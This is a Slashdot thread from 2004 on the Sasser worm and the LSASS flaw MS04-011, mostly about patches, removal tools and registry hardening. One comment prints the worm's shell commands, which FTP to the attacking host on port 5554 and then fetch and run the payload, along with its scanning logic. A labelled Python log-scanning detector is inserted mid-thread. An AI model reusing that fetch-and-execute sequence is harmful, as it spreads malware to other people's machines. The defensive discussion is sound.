New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
Removal Instructions (Score:5, Informative)
http://www.microsoft.com/security/incident/sasser
Re:I Use X Windows (Score:1, Informative)
It's started when you do
# apt-get update && apt-get dist-upgrade
Re:Mutex Trapping (Score:5, Informative)
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
Re:Mutex Trapping (Score:3, Informative)
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked by mutex.
Re:Mutex Trapping (Score:5, Informative)
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/ru
Where's Panda? (Score:2, Informative)
Where's Panda [pandasoftware.com] in that list? Personally I prefer Panda over those.
How it works (Score:5, Informative)
It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
Re:Mutex Trapping (Score:5, Informative)
Re:Mutex Trapping (Score:5, Informative)
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries.
Re:Mutex Trapping (Score:5, Informative)
Note this only works on NT-based systems (e.g., WinXP)
Re:Mutex Trapping (Score:5, Informative)
Re:Why use windows update? (Score:3, Informative)
Re:I Use X Windows (Score:5, Informative)
some important points (Score:4, Informative)
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
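An added example, not code from the thread or from any of the vendors it links: a small Python detector that reads iptables-style firewall lines, counts the distinct destinations each source hits on the three TCP ports named above, and notes how many of those targets share the source's first octet (the address-range bias the Symantec excerpt earlier in the thread describes). The log format, the sample lines and the three-target threshold are assumptions.

```python
import re
from collections import defaultdict

# Ports the thread names as Sasser traffic: 445 (LSASS), 5554 (worm FTP), 9996 (shell).
SASSER_PORTS = {445, 5554, 9996}

# iptables-style log line (assumed format; adapt the regex to your firewall).
LOG_RE = re.compile(r"SRC=(?P<src>[\d.]+)\s+DST=(?P<dst>[\d.]+).*?PROTO=TCP.*?DPT=(?P<dpt>\d+)")

def parse_line(line):
    """Return (src, dst, dport) for a matching TCP log line, else None."""
    m = LOG_RE.search(line)
    return (m.group("src"), m.group("dst"), int(m.group("dpt"))) if m else None

def find_scanners(lines, min_targets=3):
    """Report sources that hit Sasser ports on >= min_targets distinct hosts.
    same_octet counts targets sharing the source's first octet, the bias the
    Symantec description in the thread attributes to the worm's address generator."""
    targets, ports = defaultdict(set), defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, dport = parsed
        if dport in SASSER_PORTS:
            targets[src].add(dst)
            ports[src].add(dport)
    report = {}
    for src, dsts in targets.items():
        if len(dsts) < min_targets:
            continue
        octet = src.split(".")[0]
        report[src] = {
            "targets": len(dsts),
            "ports": sorted(ports[src]),
            "same_octet": sum(d.split(".")[0] == octet for d in dsts),
        }
    return report

# Constructed sample lines (not from the thread): one host sweeping 445/5554,
# one ordinary SMB connection, one unrelated HTTP hit.
SAMPLE_LOG = [
    "May  1 10:00:01 fw kernel: IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP SPT=1025 DPT=445",
    "May  1 10:00:02 fw kernel: IN=eth0 OUT= SRC=192.0.2.10 DST=192.0.2.77 PROTO=TCP SPT=1026 DPT=445",
    "May  1 10:00:02 fw kernel: IN=eth0 OUT= SRC=192.0.2.10 DST=192.44.9.1 PROTO=TCP SPT=1027 DPT=445",
    "May  1 10:00:03 fw kernel: IN=eth0 OUT= SRC=192.0.2.10 DST=203.0.113.8 PROTO=TCP SPT=1028 DPT=5554",
    "May  1 10:00:04 fw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.9 PROTO=TCP SPT=2000 DPT=445",
    "May  1 10:00:05 fw kernel: IN=eth0 OUT= SRC=10.0.0.6 DST=10.0.0.9 PROTO=TCP SPT=2001 DPT=80",
]
```

Calling find_scanners(SAMPLE_LOG) reports only 192.0.2.10: four targets on ports 445 and 5554, two of them in the same /8 as the source.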
Bad Link...Here's the Correct One (Score:3, Informative)
Re:I Use X Windows (Score:2, Informative)
Windows XP SP1 Fixed This! (Score:2, Informative)
Re:Oh the irony (Score:2, Informative)
The worm can be removed with McAfee's Stinger tool (the McAfee link has a link to it).
Systems all clear.
Re:Mutex Trapping (Score:2, Informative)
Re:I Use X Windows (Score:5, Informative)
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design: Windows is still at heart a single-user operating system; Linux, Unix, BSD, etc. are all multi-user operating systems, and it is reflected in installs.
Re:Mutex Trapping (Score:5, Informative)
Access attempts will show up in the event viewer.
Note: use regedt32.exe for Win2000 or earlier. For later versions, regedit.exe does everything (under Edit->Permissions).
windows users never fail to amaze me. (Score:2, Informative)
Tested this in my home network (the other half has to have Windows). Her rights are set by a Samba server acting as a PDC (I was bored), but it basically boils down to a simple matter of her account being considered a "limited account" on her local XP machine... if something needs to be installed or needs admin rights she can explicitly tell it to by using the run as...
I've gone from cleaning 50+ items/week off that machine to maybe 3-4, and those are simply cookies being reported as "spyware".
Re:I Use X Windows (Score:4, Informative)
Re:Security Update Dates (Score:3, Informative)
Re:Windows is a joke, but hey, smile. (Score:3, Informative)
In 2k and XP, you can
1- do nothing
2- ask before downloading and before installing (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or 3 am); if a reboot is needed when a user logs in, it asks to reboot.
By default it's #3.
In 2k, the option can be changed in the control panel (SP3 or higher needed).
In XP, right click on "My Computer", Properties, go to the Automatic Updates tab.
Re:Windows XP SP1 Fixed This! (Score:4, Informative)
Uh... what?
Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. [mitre.org] (emphasis mine)
if it blocks your favorite removal/anti-virus site (Score:2, Informative)
I've told so many others by now, so I might as well put it on Slashdot
Wow! Bushfire! (Score:3, Informative)
Re:I Use X Windows (Score:1, Informative)
Re:Windows update freaking out! (Score:5, Informative)
Re:I Use X Windows (Score:2, Informative)
No, you can't. Linux ignores the suid flag on scripts.
Re:Linux is vulnerable too (The anti-anti-windows F (Score:2, Informative)
Re:ah... (Score:2, Informative)
VPN over TCP will give you performance problems. In fact any tunnel device over TCP will give you performance problems. It is the two instances of TCP in the protocol stack that are responsible for most of the problems. Any VPN system built on TCP is broken; it should be built on UDP.